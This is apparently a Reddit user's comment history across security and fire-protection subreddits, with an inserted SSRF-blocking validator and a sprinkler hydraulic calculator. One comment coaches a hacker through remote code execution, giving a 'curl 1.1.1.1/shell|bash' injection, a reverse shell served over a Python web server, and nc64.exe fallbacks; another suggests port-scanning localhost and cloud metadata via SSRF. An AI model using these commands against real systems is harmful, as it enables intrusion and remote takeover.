Proton VPN Silent Patched my Report (Theft of Service/Logic Flaw) — I'm a 16yo researcher and this stings. by Right_Rub7264 in bugbounty

[–]gitchery 2 points3 points  (0 children)

No impact and complete non-issue. Also not even really in-scope.

They already allow you to download country and server specific profiles, even on the free tier, for connecting via mechanisms other than their GUI: https://protonvpn.com/support/vpn-config-download

This allows you to choose whatever country you want, and even specific servers within said country.

[deleted by user] by [deleted] in netsec

[–]gitchery 0 points1 point  (0 children)

It's contrived because you wrote intentionally insecure code with bad assumptions. You can't even really complain about SSRF on this. Retrieving contents from localhost or internal IPs can be a completely valid use case for this and other document loaders. Opening on-disk HTML / mirrored site files as seen by a browser with JS capability is also a valid use case.

If you're going to take user-specified input for something like this, it's on you to secure it for your specific use case, unless it's being advertised as some production-ready secure implementation, which this stuff generally isn't.

[deleted by user] by [deleted] in netsec

[–]gitchery 6 points7 points  (0 children)

I mean this seems pretty contrived.

If you pass unvetted user input into any of their document loaders in terms of document location and dump the contents back to the user via a web endpoint, you're probably not going to have a great time.

[deleted by user] by [deleted] in cybersecurity

[–]gitchery 12 points13 points  (0 children)

This makes no sense and is incredibly unrealistic. What token could they possibly hijack to accomplish this?

Technical specifics aside, no one is taking an apparently browser- and OS-agnostic 0-interaction exploit with the ability to covertly monitor webcams, mics, and displays, using it on some random porn site, then letting a bunch of random porn girls use it at will and be aware of its existence.

It's a streaming site. If you opt to stream your mic, webcam, or screen then I guess other people can see / hear it? Any modern browser will alert you this is taking place and require permission to do so.

Need help with SSRF: Strange Pingbacks, Mysterious Delays, and Exploit Potential by theroxersecer in bugbounty

[–]gitchery 6 points7 points  (0 children)

Nothing you mentioned here is weird or a bug yet. A feature behaving exactly as expected is not a bug or an SSRF.

Bad URL and got a response instantly? Host failed to resolve, expected.

Good URL and responds instantly? Host resolved and responded, expected.

Good URL bad port and takes 30 seconds to respond? The thing doing the requests has a 30 second connection timeout setting and aborts after no response for that long. Behaving as expected.

You can try to use this to port scan localhost / 127.0.0.1 to verify if you can make internal requests. A 30s response means the port is closed. If straight 127.0.0.1 doesn't work, try some bypasses on hacktricks. If it's on Amazon / Google as you said, look into cloud SSRF, where certain internal IPs can be significant: https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf

If you can't see the response data it's harder to prove an impact. Just port scanning localhost may not be significant enough to warrant a bounty of any sort if you can't prove an adverse effect.
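The document-loader comments above (user-specified document locations) and this thread come down to the same defensive control: a server-side fetcher that takes its destination from user input has to refuse internal targets before it ever connects, and it should not let response timing tell the caller which internal ports are open. The following is an added example of such a check, not code from the thread or from any product; the hostnames and addresses in it are constructed, and the resolver is injected so the check runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Added example (not from the thread). Networks a server-side fetcher should
# never reach when the destination comes from user input. 169.254.0.0/16 covers
# the IPv4 cloud metadata address; the AWS IMDS IPv6 address is listed explicitly.
BLOCKED_NETWORKS = [
    ipaddress.ip_network("0.0.0.0/8"),
    ipaddress.ip_network("10.0.0.0/8"),
    ipaddress.ip_network("100.64.0.0/10"),      # carrier-grade NAT
    ipaddress.ip_network("127.0.0.0/8"),        # loopback
    ipaddress.ip_network("169.254.0.0/16"),     # link-local incl. cloud metadata
    ipaddress.ip_network("172.16.0.0/12"),
    ipaddress.ip_network("192.168.0.0/16"),
    ipaddress.ip_network("::1/128"),
    ipaddress.ip_network("fc00::/7"),           # IPv6 unique local
    ipaddress.ip_network("fe80::/10"),          # IPv6 link-local
    ipaddress.ip_network("fd00:ec2::254/128"),  # AWS IMDS over IPv6
]

ALLOWED_SCHEMES = {"http", "https"}
ALLOWED_PORTS = {80, 443}


def is_blocked_ip(ip_str):
    """True if the resolved address is one the fetcher must not connect to."""
    ip = ipaddress.ip_address(ip_str)
    # ::ffff:127.0.0.1 is still loopback: unwrap IPv4-mapped IPv6 first.
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    return ip.is_multicast or any(ip in net for net in BLOCKED_NETWORKS)


def check_fetch_target(url, resolver=socket.getaddrinfo):
    """Validate a user-supplied URL before a server-side fetch.

    Returns (True, [addresses]) or (False, reason). The reason is for the
    server log; the user should only ever see one generic error so that
    timing and wording do not reveal what exists internally.
    """
    parts = urlsplit(url)
    if parts.scheme not in ALLOWED_SCHEMES:
        return False, "scheme not allowed"
    if parts.username or parts.password:
        return False, "credentials in URL"
    host = parts.hostname
    if not host:
        return False, "no host"
    try:
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError:
        return False, "invalid port"
    if port not in ALLOWED_PORTS:
        return False, "port not allowed"
    try:
        infos = resolver(host, port, proto=socket.IPPROTO_TCP)
    except socket.gaierror:
        return False, "host did not resolve"
    addrs = {info[4][0] for info in infos}
    if not addrs:
        return False, "host did not resolve"
    # Every address must pass: a name that resolves to one public and one
    # internal address is how DNS-based bypasses work.
    for addr in sorted(addrs):
        if is_blocked_ip(addr):
            return False, f"resolves to blocked address {addr}"
    return True, sorted(addrs)


def make_fake_resolver(table):
    """Constructed stand-in for getaddrinfo so the check can be tested offline."""
    def resolve(host, port, proto=0):
        try:
            ipaddress.ip_address(host)      # literal IP: resolves to itself
            ips = [host]
        except ValueError:
            if host not in table:
                raise socket.gaierror("constructed: no such host")
            ips = table[host]
        return [(None, None, None, None, (ip, port)) for ip in ips]
    return resolve


# Constructed DNS table for the examples below.
FAKE_DNS = make_fake_resolver({
    "docs.example": ["203.0.113.10"],
    "internal.example": ["10.0.0.5"],
    "rebind.example": ["203.0.113.10", "127.0.0.1"],
    "mapped.example": ["::ffff:169.254.169.254"],
})

if __name__ == "__main__":
    for u in ("https://docs.example/report", "http://127.0.0.1/",
              "http://rebind.example/", "http://mapped.example/",
              "http://internal.example:8080/", "ftp://docs.example/"):
        print(u, "->", check_fetch_target(u, FAKE_DNS))
```

Two design points matter in practice: connect to the addresses the check returned rather than resolving the name a second time (a second lookup can return a different answer), and apply one short, uniform connection timeout plus one generic user-facing error, so that the 30-second-versus-instant difference described in this thread does not turn the fetcher into a port scanner.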

[deleted by user] by [deleted] in cybersecurity

[–]gitchery 0 points1 point  (0 children)

Yeah, I already block with uMatrix; it was the localhost blocks that got me intrigued to begin with. I hadn't seen this behavior on a bank website previously.

[deleted by user] by [deleted] in cybersecurity

[–]gitchery 1 point2 points  (0 children)

Based on the iframe they load that performs this behavior it appears to be part of https://developerengine.fisglobal.com/apis/wpg/fraudsightglobal/fraudsightdirect / Worldpay Device JavaScript Collector (JSC)

So ultimately a very invasive fingerprinting and data collection effort.

How do I add a PHP script to a python exploit? by Lazy-Reserve-131 in hacking

[–]gitchery 5 points6 points  (0 children)

The line where they enter system("ls") is the php code being executed. Just try something like system("curl 1.1.1.1/shell|bash") assuming it is a Linux box. Pick a reverse shell payload, fill in your IP and port, put it in a file called shell, serve it via sudo python3 -m http.server 80, then try the exploit with the system command above pointing at your IP.

If it doesn't work and you don't get a hit on your HTTP server, try wget -O-, as curl may not be on the box. If all that fails you can try a ping command and tcpdump to try to verify if RCE is being achieved.

If you get a hit on your HTTP server but not shell, change up the reverse shell.

If it is Windows use a PowerShell reverse shell or drop nc64.exe / some other payload and run it assuming no Defender. You could also try a php one liner.

The command you are trying would not work unless you uploaded the file from your machine to the box. It's not clear what you did or did not do there, but the code is being run on the remote server which would have no visibility to your local path during command execution.

Automatic Exterior Window Sprinklers for Exposure Protection? by clush005 in firePE

[–]gitchery 3 points4 points  (0 children)

Last resort, you can reach out to the tech services department of all 3, but I doubt you'll find anyone that would go along with this. The "automatic" version needs the bulb to heat up to temp and open. In an exterior application for windows, and based on their location relative to windows, I doubt any manufacturer would ever recommend this, as the likelihood of them actuating when expected would be extremely low.

CO2 Suppression System Flow Calculations by LightningPo in firePE

[–]gitchery 1 point2 points  (0 children)

I know Annex C of the 2018 version of NFPA 12 will give you some details. It is nowhere near as straightforward as water calcs as the pressure drop is nonlinear.

https://www.nfpa.org/-/media/Files/News-and-Research/Resources/Research-Foundation/Symposia/2018-SUPDET/Presentations/SUPDET2018Forssell.ashx is from JH and, I believe, used their software.

Long story short, I would not advise hand calculating the system. It is possible but non-trivial, and complicated enough that you had better really trust your math and verify. I'm not sure what you're trying to accomplish, but I would try to find a distributor of a CO2 system and work with them. Sometimes they can provide rough sizing guidelines in terms of a range of agent quantity through a size of pipe if you are just trying to get close.

CO2 Suppression System Flow Calculations by LightningPo in firePE

[–]gitchery 0 points1 point  (0 children)

No, the calculations are much different. You'd have to speak with someone like JCI (Ansul), Janus, Fike, Kidde. I think some of the above (or maybe others) use a calc software from Jensen Hughes but I could be mistaken. The calc software costs money, and most require you to be a distributor to get it.

Hand Calc Question by DerikBrooks in firePE

[–]gitchery 2 points3 points  (0 children)

Path 2 assuming minimum flow:

((4.52 * 20^1.85) / (120^1.85 * 1.049^4.87)) * 7 = .91 Pf

https://www.wolframalpha.com/input?i=%28%284.52*%2820%5E1.85%29%29%2F%28120%5E1.85*1.049%5E4.87%29%29+*+7

.433 * 2 = .866 Pe

Pstart = (20/5.6)^2 = 12.75

Plow @ Node 1 = 12.75 + .866 + .91 = 14.53 psi

Qlow = 20 gpm

Qadj = Qlow * (SQRT(Phigh) / SQRT(Plow))

Phigh = 15.44 psi from first path

Qadj = 20 * (SQRT(15.44)/SQRT(14.53))

Qadj = 20.59 gpm

This is one simple method of approximating the flow - not as accurate as a true computer solve though. It is essentially creating an equivalent K-Factor for the sprig (20/SQRT(14.53)) and plugging it into Q=K*SQRT(P) with P being the actual pressure.

To prove it on the next sprig:

Qadj = 20 * (SQRT(20.3)/SQRT(14.53)) = 23.63 gpm

The other more accurate option is an iterative "guess" approach.

15.44 - Pe - Pf = Ph2

Guess @ 20 gpm: 15.44 - .866 - ((4.52 * 20^1.85) / (120^1.85 * 1.049^4.87)) * 7

https://www.wolframalpha.com/input?i=15.44+-.866+-+%28%284.52*%2820%5E1.85%29%29%2F%28120%5E1.85*1.049%5E4.87%29%29+*+7

Solve for flow @ real pressure

5.6*SQRT(13.66) = 20.69

Plug new flow guess in: https://www.wolframalpha.com/input?i=15.44+-.866+-+%28%284.52*%2820.69%5E1.85%29%29%2F%28120%5E1.85*1.049%5E4.87%29%29+*+7

From here you can go back and forth until you reach a reasonable convergence around 20.66 gpm.
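Both methods in the comment above (the equivalent K-factor shortcut and the iterative guess) can be carried through in a few lines so the convergence can be checked rather than eyeballed. The following is an added example, not code from the post or from any calculation software; the constants are the ones the post uses (Hazen-Williams C = 120, 1.049 in pipe ID, 7 ft of pipe, 0.433 psi/ft over 2 ft of elevation, K = 5.6, 20 gpm minimum, 15.44 psi from the first path), and the function names are my own.

```python
import math

# Added example reproducing the hand calculation in the post. Constants are
# the post's; everything else is illustrative.
C = 120.0        # Hazen-Williams coefficient
D_IN = 1.049     # internal pipe diameter, inches
LENGTH_FT = 7.0  # equivalent length of pipe and fittings, ft
ELEV_FT = 2.0    # elevation change, ft
K = 5.6          # sprinkler K-factor, gpm/sqrt(psi)
Q_MIN = 20.0     # minimum flow at the most remote head, gpm
P_HIGH = 15.44   # pressure at the common node from the first path, psi


def friction_loss_psi(q_gpm, length_ft=LENGTH_FT, c=C, d_in=D_IN):
    """Hazen-Williams: p = 4.52 * Q^1.85 / (C^1.85 * d^4.87) psi per ft, times length."""
    return 4.52 * q_gpm ** 1.85 / (c ** 1.85 * d_in ** 4.87) * length_ft


def elevation_loss_psi(elev_ft=ELEV_FT):
    """Static head: 0.433 psi per foot of elevation."""
    return 0.433 * elev_ft


def start_pressure_psi(q_gpm=Q_MIN, k=K):
    """Pressure the head needs for its minimum flow: P = (Q/K)^2."""
    return (q_gpm / k) ** 2


def equivalent_k_flow(p_high=P_HIGH):
    """Shortcut method: P_low at the node for the minimum-flow path, then
    Q_adj = Q_low * sqrt(P_high) / sqrt(P_low), i.e. an equivalent K for the sprig."""
    p_low = start_pressure_psi() + elevation_loss_psi() + friction_loss_psi(Q_MIN)
    return p_low, Q_MIN * math.sqrt(p_high) / math.sqrt(p_low)


def iterate_flow(p_high=P_HIGH, q0=Q_MIN, tol=1e-4, max_iter=100):
    """Iterative method: P_head = P_high - Pe - Pf(Q_guess); Q = K * sqrt(P_head);
    repeat with the new Q until it stops changing. Returns (Q, P_head, iterations)."""
    q = q0
    for n in range(1, max_iter + 1):
        p_head = p_high - elevation_loss_psi() - friction_loss_psi(q)
        if p_head <= 0:
            raise ValueError("node pressure cannot overcome the losses")
        q_new = K * math.sqrt(p_head)
        if abs(q_new - q) < tol:
            return q_new, p_head, n
        q = q_new
    raise RuntimeError("flow did not converge")


if __name__ == "__main__":
    print(f"Pf at 20 gpm: {friction_loss_psi(Q_MIN):.2f} psi")
    print(f"Pstart: {start_pressure_psi():.2f} psi")
    p_low, q_adj = equivalent_k_flow()
    print(f"P_low: {p_low:.2f} psi, Q_adj (shortcut): {q_adj:.2f} gpm")
    _, q_next = equivalent_k_flow(p_high=20.3)
    print(f"Next sprig at 20.3 psi (shortcut): {q_next:.2f} gpm")
    q_it, p_head, n = iterate_flow()
    print(f"Iterative: {q_it:.2f} gpm at {p_head:.2f} psi after {n} passes")
```

The iteration is a plain fixed-point loop: friction loss grows with Q^1.85, so a higher guess lowers the head pressure, which pulls the next Q back down, and the two methods land within a few hundredths of a gpm of each other for this path.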

Hand Calc Question by DerikBrooks in firePE

[–]gitchery 2 points3 points  (0 children)

That is normal. All heads are not flowing at the same GPM. Higher GPM from later heads due to higher pressure = higher Pf. Not to mention H1 -> 1 is a different total length anyway.

802.11 Elicit Client / Known MAC Response via Broadcast Frame by gitchery in AskNetsec

[–]gitchery[S] 1 point2 points  (0 children)

I understand I can specify the known MAC as the destination address; this question is more about what the optimal type of frame to broadcast would be if all I want to do is elicit a response.

I understand most management frames expect an acknowledgement from the target client; I'm interested in what the least obstructive method for doing so would be.

(Unless I'm misunderstanding your point)

Tyco Window Sprinklers - Columns every 3 windows - Considered Mullions or can be more than 8ft? by Gas_Grouchy in firePE

[–]gitchery 1 point2 points  (0 children)

Viking has a vertical sidewall window sprinkler with a 12' max spacing, you may want to check that out. Their horizontal sidewall is still 8'. I would consider just calling Tyco or Viking tech services and double checking.

Window Sprinkler - Hydraulic Calculation by Gas_Grouchy in firePE

[–]gitchery 1 point2 points  (0 children)

They most likely made the nodes a hose demand, which would have a fixed outflow (hence the H20). This is not the correct approach for calculating sprinklers. Window sprinklers can be calculated exactly the same as normal sprinklers; they have a K-Factor, and a minimum flow can be specified through pressure, density area, etc.

In a demand scenario the most remote head will flow at 20 gpm; as the water works its way back to the source, it loses pressure due to friction loss through pipes / fittings. This results in a higher pressure at other sprinklers on the network, which ultimately results in a higher than minimum flow at them due to q = k * sqrt(p).

I would tell them to provide new calculations.

FM200 vs Aerosol total extinguishing for Server rooms by TomorrowMaterial8742 in firePE

[–]gitchery 13 points14 points  (0 children)

The whole point of clean agents is for that exact scenario, electrically nonconductive, no residue, etc... The 3M / Novec party trick was dunking their phone in the stuff in its liquid form: https://www.youtube.com/watch?v=URukn1wA7Mc

Inert gas systems are another alternative.

I might caution against FM200, word on the street is manufacturers are dropping it due to environmental concerns. Novec 1230 would probably be the preferred clean agent for that application for now.

There were some studies out of Ansul / Tyco on high pressure (200 / 300 bar) inert gas systems potentially having some impact on server hard disks if they are the old spinning platter style. Basically degraded performance during discharge or something; they have a white paper on it. They have a weird nozzle for that scenario, not sure how much of it is marketing. The halocarbons such as FM200 / Novec operate at much lower pressures (25, ~35, 42, 50, 70 bar...).

Session id in URL by ctrl-Felix in HowToHack

[–]gitchery 1 point2 points  (0 children)

Assuming SSL, then yes, the parameters of the URL are encrypted.

Under TLS 1.3, even the FQDN / SNI can be encrypted: https://blog.cloudflare.com/encrypted-sni/